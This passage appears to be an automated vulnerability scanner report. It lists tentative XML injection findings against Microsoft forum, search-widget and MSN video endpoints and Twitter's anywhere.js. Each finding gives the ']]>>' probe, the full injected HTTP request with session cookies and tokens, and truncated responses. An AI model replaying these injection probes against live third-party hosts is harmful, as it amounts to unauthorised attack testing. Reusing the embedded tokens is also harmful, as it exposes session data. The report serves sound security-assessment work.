Confidence:	Tentative
Host:	http://forums.silverlight.net
Path:	/user/viewonline.aspx

Issue detail

The omniID cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the omniID cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 334468
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:33:46 GMT; expires=Sun, 29-Jan-2012 23:33:46 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:53:46 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:33:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Who's
...[SNIP]...
<a href="/forums/p/18945/64900.aspx">Xml Parsing problem: Xml.Rearder.ReadToFollowing causes problem : The Official Microsoft Silverlight Site</a>
...[SNIP]...

9.12. http://forums.silverlight.net/user/viewonline.aspx [s_sq cookie] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://forums.silverlight.net
Path:	/user/viewonline.aspx

Issue detail

The s_sq cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the s_sq cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /user/viewonline.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA]]>>; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=ruxlz555oj0h2x45b1b2w5yv;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 237293
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:28:23 GMT; expires=Sun, 29-Jan-2012 23:28:23 GMT; path=/
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sat, 29-Jan-2011 23:48:23 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:28:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head><title>
Who's
...[SNIP]...
x">{System.InvalidOperationException: There was an error reflecting 'Exception'. ---> System.InvalidOperationException: Namespace='http://xxxx.xxxx.net/xxxx/Xxxxx' is not supported with rpc\literal SOAP. The wrapper element has to be unqualified. : The Official Microsoft Silverlight Site</a>
...[SNIP]...

9.13. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [allowEmptySearch parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://i4.services.social.microsoft.com
Path:	/search/Widgets/SearchBox.jss

Issue detail

The allowEmptySearch parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the allowEmptySearch parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /search/Widgets/SearchBox.jss?appid=1000&scopeid=1&boxId=searchBox&btnId=submitSearch&watermark=Search%20all%20projects&overrideWatermark=true&searchLocation=%2fsite%2fsearch&allowEmptySearch=true]]>>&focusOnInit=True&minimumTermLength=3 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://silverlight.codeplex.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 400 Bad Request
Content-Length: 1647
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB37
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 19:37:30 GMT
Connection: close
Vary: Accept-Encoding

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...

9.14. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [appid parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://i4.services.social.microsoft.com
Path:	/search/Widgets/SearchBox.jss

Issue detail

The appid parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the appid parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /search/Widgets/SearchBox.jss?appid=1000]]>>&scopeid=1&boxId=searchBox&btnId=submitSearch&watermark=Search%20all%20projects&overrideWatermark=true&searchLocation=%2fsite%2fsearch&allowEmptySearch=true&focusOnInit=True&minimumTermLength=3 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://silverlight.codeplex.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 400 Bad Request
Content-Length: 1647
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB38
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 19:37:20 GMT
Connection: close
Vary: Accept-Encoding

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...

9.15. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [focusOnInit parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://i4.services.social.microsoft.com
Path:	/search/Widgets/SearchBox.jss

Issue detail

The focusOnInit parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the focusOnInit parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /search/Widgets/SearchBox.jss?appid=1000&scopeid=1&boxId=searchBox&btnId=submitSearch&watermark=Search%20all%20projects&overrideWatermark=true&searchLocation=%2fsite%2fsearch&allowEmptySearch=true&focusOnInit=True]]>>&minimumTermLength=3 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://silverlight.codeplex.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 400 Bad Request
Content-Length: 1647
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB35
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 19:37:31 GMT
Connection: close
Vary: Accept-Encoding

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...

9.16. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [minimumTermLength parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://i4.services.social.microsoft.com
Path:	/search/Widgets/SearchBox.jss

Issue detail

The minimumTermLength parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the minimumTermLength parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /search/Widgets/SearchBox.jss?appid=1000&scopeid=1&boxId=searchBox&btnId=submitSearch&watermark=Search%20all%20projects&overrideWatermark=true&searchLocation=%2fsite%2fsearch&allowEmptySearch=true&focusOnInit=True&minimumTermLength=3]]>> HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://silverlight.codeplex.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 400 Bad Request
Content-Length: 1647
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB29
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 19:37:33 GMT
Connection: close
Vary: Accept-Encoding

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...

9.17. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [overrideWatermark parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://i4.services.social.microsoft.com
Path:	/search/Widgets/SearchBox.jss

Issue detail

The overrideWatermark parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the overrideWatermark parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /search/Widgets/SearchBox.jss?appid=1000&scopeid=1&boxId=searchBox&btnId=submitSearch&watermark=Search%20all%20projects&overrideWatermark=true]]>>&searchLocation=%2fsite%2fsearch&allowEmptySearch=true&focusOnInit=True&minimumTermLength=3 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://silverlight.codeplex.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 400 Bad Request
Content-Length: 1647
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB35
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 19:37:27 GMT
Connection: close
Vary: Accept-Encoding

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...

9.18. http://i4.services.social.microsoft.com/search/Widgets/SearchBox.jss [scopeid parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://i4.services.social.microsoft.com
Path:	/search/Widgets/SearchBox.jss

Issue detail

The scopeid parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the scopeid parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /search/Widgets/SearchBox.jss?appid=1000&scopeid=1]]>>&boxId=searchBox&btnId=submitSearch&watermark=Search%20all%20projects&overrideWatermark=true&searchLocation=%2fsite%2fsearch&allowEmptySearch=true&focusOnInit=True&minimumTermLength=3 HTTP/1.1
Host: i4.services.social.microsoft.com
Proxy-Connection: keep-alive
Referer: http://silverlight.codeplex.com/?1'=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_NVR_RU=0=technet:1=:2=; MSID=Microsoft.CreationDate=01/12/2011 02:50:01&Microsoft.LastVisitDate=01/12/2011 02:50:01&Microsoft.VisitStartDate=01/12/2011 02:50:01&Microsoft.CookieId=999b633b-60f0-47aa-b786-00cf3055d1d4&Microsoft.TokenId=92dc7eb2-dead-49da-9574-c9e669f255fd&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=NbkBuOI4W7cBv1mnAHhVbMOQZR4pSFpAnK7y46YYoMuoTqVfvpOJDTYUAUbtS2cNI8BvaR+SCC23nZMTeytyi7wNmiKQoC0huKoVOxO9PG4349NCx7DVlNmV/I4bkLVsQPDWI9Bsqfw4CAigE1dAh1BYCtKZo9uqxkgiGwXq+e0k2CWQBMJydEvQvf+a8Nmy0lBvBx9sMp029vD2knhH9q3cjQbZxn3d/T9SCIAmvvv/s2I5E7D3U2bYKmXA8D2pYaGjWhFIkGPPBwVNdZM0gBNghumGYE3ytU+ILnGMVeSvePI6D6PqDJrflWnDWzImxN5OE1evuVhNxF+HLtGrIkyVXonl+BTy57QP6nzOR8xDTgEwSjCHY8/Bk9JyRwZg7yIiU4jUEbrdJT2XMDr4AswK4Wiy1TGrclwPTNsTA9c0XB9nYdOMBy66L0gCAgZ5Xl2KxwR+ak8o2EGeRwJddAgw92owb1NRPjd/6vkOYqly9qWJu5Yj/8uUccCK8nxtzsHYjQ2KgbbGdKcZOJMx5arSS+8FsBl+/Opeqt5VTOk=&Microsoft.MicrosoftId=0237-9950-5424-5770; MC1=GUID=60c2f44dfd912641a24c313b7d619d75&HASH=4df4&LV=20111&V=3; WT_FPC=id=173.193.214.243-2629510496.30125799:lv=1294837831501:ss=1294837831501; omniID=1294458843112_6a73_9555_4be9_86ce555049db; msdn=L=1033; A=I&I=AxUFAAAAAAAWBwAAtB6/BX1JsfAlwGK0F9Loug!!&M=1; ixpLightBrowser=0

Response

HTTP/1.1 400 Bad Request
Content-Length: 1647
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB32
Cache-Control: private, max-age=86400
Date: Sun, 30 Jan 2011 19:37:22 GMT
Connection: close
Vary: Accept-Encoding

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/199
...[SNIP]...

9.19. http://img.widgets.video.s-redacted/resource.aspx [responseEncoding parameter] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://img.widgets.video.s-redacted
Path:	/resource.aspx

Issue detail

The responseEncoding parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the responseEncoding parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /resource.aspx?resources=gallery&gmts=gmt&mkt=&configCsid=MSNmoney&configName=money-gallery-v2-site-wide&responseEncoding=json]]>>&callbackName=Msn.Video.JavascriptApi.onComplete&cd=0 HTTP/1.1
Host: img.widgets.video.s-msn.com
Proxy-Connection: keep-alive
Referer: http://money.redacted//?4ae1b
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=1800
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Age: 2
Date: Sun, 30 Jan 2011 19:38:33 GMT
Last-Modified: Sun, 30 Jan 2011 19:38:32 GMT
Expires: Sun, 30 Jan 2011 20:08:31 GMT
Connection: keep-alive
Content-Length: 11430

...<?xml version="1.0" encoding="utf-8"?><xml><config><default><d k="gallery.defaultView" v="Grid" /><d k="gallery.dispContainer" v="false" /><d k="gallery.imageHeightGrid" v="77" /><d k="gallery.imag
...[SNIP]...

9.20. http://platform.twitter.com/anywhere.js [REST URL parameter 1] previous next

Summary

Severity:	Medium
Confidence:	Tentative
Host:	http://platform.twitter.com
Path:	/anywhere.js

Issue detail

Request

GET /anywhere.js]]>>?v=1&id= HTTP/1.1
Host: platform.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=43838368.lang%3A%20en; __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; __utma=43838368.1078689092.1296223511.1296232506.1296314194.3; k=173.193.214.243.1296227675375304;

Response

HTTP/1.1 403 Forbidden
Content-Type: application/xml
Date: Sun, 30 Jan 2011 02:17:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
